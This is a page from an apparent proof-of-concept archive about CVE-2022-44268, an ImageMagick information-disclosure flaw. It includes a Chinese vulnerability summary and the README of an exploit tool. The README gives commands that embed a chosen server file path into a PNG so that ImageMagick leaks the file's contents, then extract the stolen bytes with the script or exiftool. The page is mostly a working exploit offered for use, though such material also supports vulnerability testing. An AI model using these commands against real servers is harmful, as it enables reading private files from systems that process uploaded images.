Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2022-44268 PoC — ImageMagick 安全漏洞

Source
Associated Vulnerability
Title:ImageMagick 安全漏洞 (CVE-2022-44268)
Description:ImageMagick是美国ImageMagick公司的一套开源的图像处理软件。该软件可读取、转换或写入多种格式的图片。 ImageMagick 7.1.0-49版本存在安全漏洞,该漏洞源于存在信息泄露漏洞,当它在解析PNG图像时生成的图像可能会嵌入任意文件内容。
Readme
# Fixed version of CVE-2022-44268

Some PoCs don't work for specific file contents. This PoC may work for contents that don't work with other PoCs.

# Installation
Git clone this repo. Then, install the requirements.
```sh
pip install -r requirements.txt
```

# Usage
To embed your payload within an image:
```sh
python3 MagickPNG.py -i <image to modify> -f <file to read> -o <output file>
```

> Then use ImageMagick to update your PNG.

To extract data from the ImageMagick modified file:
```sh
python3 MagickPNG.py -d <resulting image> -o <output file>
```

If this doesnt work, try using exiftool to extract the bytes as hex.
```sh
exiftool -all:all -s image.png -b
```

### original poc:
[here](https://github.com/kljunowsky/CVE-2022-44268)
File Snapshot

[4.0K] /data/pocs/650f923d85a23a5710a12e569bb21c6c5358c802 ├── [1.2K] MagickPNG.py ├── [ 745] README.md ├── [ 15] requirements.txt └── [401K] sample-exploit-img.png 0 directories, 4 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.